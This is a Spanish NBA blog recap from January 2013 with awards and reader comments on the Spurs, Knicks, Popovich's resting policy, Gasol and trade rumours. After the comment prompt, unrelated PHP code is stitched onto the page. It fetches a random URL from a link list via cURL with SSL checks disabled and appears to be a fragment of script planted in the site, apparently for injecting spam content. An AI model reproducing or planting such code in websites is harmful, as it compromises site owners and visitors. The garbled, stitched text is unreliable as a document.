La Crónica: Stern satisfecho

04 de January de 2013 por txusma

4º partido en 5 días de los Spurs, 3 de ellos fuera de casa. Situación similar a la que concluyó con una multa “ejemplarizante” a Popovic por tratar de dosificar su veterana plantilla. Procedimiento distinto y resultados sutilmente diferentes. Mientras entonces disfrutamos de un apasionante choque en el que la profunda segunda unidad de San Antonio no tumbó a los campeones de milagro, anoche vimos un descafeinado sucedáneo sin mucha emoción y con lesión de Stephen Jackson incluida. Lo común en ambas situaciones es la derrota que rompía una racha victoriosa de los tejanos, en este caso de 7 seguidas, pero si aquella vez los mejores hombres de Miami tuvieron que emplearse a fondo para no perder, anoche Woodson pudo oxigenar su plantilla a placer (83-100).

La buena defensa que mostró anoche New York queda bajo sospecha por razones ajenas. Es la primera ocasión desde el 2003 en la que ganan su enfrentamiento particular a Spurs en regular. Buen partido, sin más, de Anthony y JR Smith. Suficiente para que Melo acumule 20 consecutivos en +20 (y subiendo) y se mete en una lista exclusiva en la que manda Richie Guerin con 29. Gran aportación de Chandler, como también de los reservas Copeland y Stoudemire. 

En Denver, bonito duelo de los de casa ante los Wolves pero Love terminó lesionado de un dedo. Un choque con 12 tíos en dobles figuras y 2 más acariciándolas. Los de Minnesota ganaron ampliamente los tableros pero los Nuggets lo hicieron en robos y tapones (11 y 11). El choque lo sacó de la igualdad el puertorriqueño Barea que fue decisivo en la noche negra de Denver desde la línea de tiros libres y el mal partido de McGee (101-97).

PREMIOS

MVP: Con Carmelo Anthony (23-8) y JR Smith (20-5-3) como estiletes los Knicks pasaron por encima de los Spurs sin demasiados problemas.

Rookie: Gran partido de Alexey Shved con 17 puntos, 4 rebotes y 5 asistencias.

Sorpresa: JJ Barea fue clave en la victoria de los Wolves al anotar 12 de sus 17 puntos en el último cuarto.

Decepción: Tras la lesión de Stephen Jackson, los Spurs sabían que no iban a tener un buen día. En efecto, no lo tuvieron.

Esfuerzo en vano: Derrota dolorosa de los Nuggets en casa en la que sólo se salvaron Kosta Koufos, autor de 16 puntos (8 de 10), 7 rebotes, 4 robos y 2 tapones, y Andre Miller que consiguió 11 puntos y 10 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Quería mencionarlo y, al final por unas cosas y por otras se me ha pasado: André Miller ha alcanzado la notable cifra de 15.000 puntos y 7.500 asistencias en su carrera. Es nada menos que el octavo jugador de la historia que lo consigue.
    Me parece impresionante. Habitualmente infravalorado pero siempre ha cumplido. Excelente jugador que caerá en el olvido demasiado pronto.

      Citar

  2. Esteban dice:
    #2

    txs la crocina podria decir algo sobre el partido de prigioni y sus 9 asistencias, ademas de un robo en la cara de parker, seguido por un pase gol a tyson, entre otras grandes jugadas del argentino

    de mi parte no habia duda de que lograria un lugar en esta liga

    sobre Knicks, poco se puede decir, la plantilla es hasta excesivamente larga, ayer pudimos ver a camby de titular llevarse 6 rebotes y a amare anotar algun q otro punto de la banca, mas el enborme juego de chandler y los triples de novak, a tener en cuenta que ayer no jugo Wallace y tampoco Thomas,
    como luchas frente a semenajte variedad de recursos y hombres bajo los aros?

    ayer falto felton pero la base la llevaron majestuosamente kidd y prigioni

    sigue faltando shumpert pero el duo de escoltas de acomple defensiva/ofensiva que forman brewer y j.r. smith es un lujo

    mientras que coopeland comienza a ganarse los poquitos minuots que melo deja la cancha

    en PO mucho mucho cuidado con tantos recursos y tanta rotacion

      Citar

  3. R1Molano dice:
    #3

    Warriors, 7 partidos en 10 noches en gira por el Este. Plantilla mucho mas corta y menos talentosa que la de SAS. 6-1 sin descansar jugadores y ganando en Miami.
    No Sr. Popovich sus reivindicaciones personales de menos calendario, porque a su equipo le beneficiaría, no cuelan

      Citar

  4. Esteban dice:
    #4

    R1Molano:
    Warriors, 7 partidos en 10 noches en gira por el Este. Plantilla mucho mas corta y menos talentosa que la de SAS. 6-1 sin descansar jugadores y ganando en Miami.
    No Sr. Popovich sus reivindicaciones personales de menos calendario, porque a su equipo le beneficiaría, no cuelan

    gran dato

      Citar

  5. TheDeerHunter dice:
    #5

    también más joven…
    ¿porqué es una reivindicación que juegue minutos… qué se yo… De Colo? (15-6-5 el día de Miami)
    ¿de qué sirve una plantilla tan profunda y talentosa como la de San Antonio si no te permiten emplearla para que tus veteranos se ahorren algún partido de cara a la postemporada?

    De todas formas, desde el respeto eso me parece un poco cortoplacista. Igual llega un momento que GS paga todo este esfuerzo.

      Citar

  6. nba dice:
    #6

    De momento a los Warriors parece que se les han alineado los astros a su favor, entiendo yo que para compensar la mala suerte que suelen tener respecto a lesiones, a disfrutar si consiguen dosificar un poco mas a sus titulares para evitar que se rompan despues del All-Star en el que el resto de equipos saldran con el cuchillo entre los dientes.

      Citar

  7. HisRoyalAirness dice:
    #7

    Plantilla más corta y muchísimo más joven. Pop tiene toda la razón del mundo

      Citar

  8. R1Molano dice:
    #8

    TheDeerHunter:
    también más joven…
    ¿porqué es una reivindicación que juegue minutos… qué se yo… De Colo? (15-6-5 el día de Miami)
    ¿de qué sirve una plantilla tan profunda y talentosa como la de San Antonio si no te permiten emplearla para que tus veteranos se ahorren algún partido de cara a la postemporada?

    De todas formas, desde el respeto eso me parece un poco cortoplacista. Igual llega un momento que GS paga todo este esfuerzo.

    La reivindicación de Popovich es contra el calendario. El siempre va dejando caer que el calendario NBA debería ser mar corto. También se quejo amargamente de sus giras al principio de esta temporada y resulta que la famoso viaje se alargo porque querían alquilar el pabellón para un acontecimiento.

    Si tienes una plantilla larga y talentosa úsala, tuvieron 7 partidos para rotar ampliamente sin hacer desaparecer del mapa a sus mejores jugadores sin razón de lesiones. Incluso podrían, dentro de la decencia con los aficionados y la televisión nacional, jugar amplísimo ese día con apenas 20m para las estrellas. No se alejaría de lo que hacen otros equipos al final de una asfixiante gira.

    Luego el tema del libre albedrío del entrenador… la NBA es un negocio y eso con Stern es una de las mayores máximas, y lo hemos visto en este caso y en otros casos como la sanción de toda la temporada de Artest.

    Sus suplentes compitieron en Miami, a parte de que porque son muy buenos, porque Miami va a un tran-tran bastante evidente y cuando toca partido “poco importante” o “no motivante” no hay el nivel de intensidad de los PO. En todo caso, cuando quiere Miami acelera y quiso contra OKC, con los resultados sabidos.

      Citar

  9. Denise dice:
    #9

    A mi Popovych me parece igual de payaso que Mou cuando busca enemigos en el calendario y conspiraciones judeomasónicas contra él. El calendario es muy complicado de hacer por todos los eventos relacionados o no con el baloncesto y la disponibilidad de los pabellones, y algunas veces te perjudicará jugando 3 partidos en 4 dias y otras veces te beneficiará recibiendo comodamente en tu casa tras 3 dias de descanso a un rival que jugó la noche anterior.
    Si al viejo no le gusta el calendario…que se vaya y se pierda en una isla.

      Citar

  10. nba dice:
    #10

    Trasnochar para esto, a alguien se le ocurre algun calificativo para el partido de Gasol de anoche, es que yo ya me he quedado sin palabras …, estos Lakers me empiezan a recordar sobremanera a la etapa en la que solo estaba Kobe, en primera ronda para casa, si son afortunados y consiguen llegar a playoffs

      Citar

  11. Denise dice:
    #11

    Al margen de que no juegue por dentro en ataque….el partido de Gasol fue lamentable, hay veces que no se le pueden echar todas las culpas al entrenador, Griffin se meó en el, incluso Turiaf le clavó un mate y le pilló algunos rebotes, después sale a hacer ayudas que no viene a cuento al base, Paul pasa la bola entre él y el base de Lakers a su hombre libre (Griffin), y a partir de ahí había un desbarajuste en el sistema defensivo de Lakers.
    Después para un balón por dentro que le meten, se da la vuelta y lo medio taponan desde abajo siendo ni siquiera capaz de levantar la bola.
    Además, lo ves y parece que está enfermo, como si tuviera alguna enfermedad degenerativa o llevara sin comer 3 días, no tiene ninguna energía en su juego. En fin, que éste no llega a marzo con la elástica purpura y oro.

      Citar

  12. Denise dice:
    #12

    Ah, se me olvidó, espero una sanción ejemplar al payaso de Kevin Garnett por semejante mamporro en la cara de Hansbrough.

      Citar

  13. Denise dice:
    #13

    Que parado esta esto ultimamente….bueno, dejo un nuevo rumor de trade para Pau.
    Estarían involucrados ademas de los Lakers, los Pacers y los Grizzlies; y acabaría así:

    – Lakers se llevarían a David West y Rudy Gay
    – Memphis se harían con Pau Gasol y Danny Granger
    – Indiana conseguiría a Zach Randolph y a Metta World Peace.

    Solo es un rumor, de producirse, los Lakers serían para mí los grandes beneficiados, los otros 2 equipos creo que se quedarían mas o menos igual.

      Citar

  14. Rompe dice:
    #14

    Ahora mismo creo que Zach está a un nivel muy superior al resto, si fuera Memphis no lo haría bajo ningún concepto. Un equipo que funciona no hay por qué tocarlo si no es para dar un salto de calidad grande.

      Citar

  15. nba dice:
    #15

    todo lo que no implique a Toronto, me parece un trade irreal

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>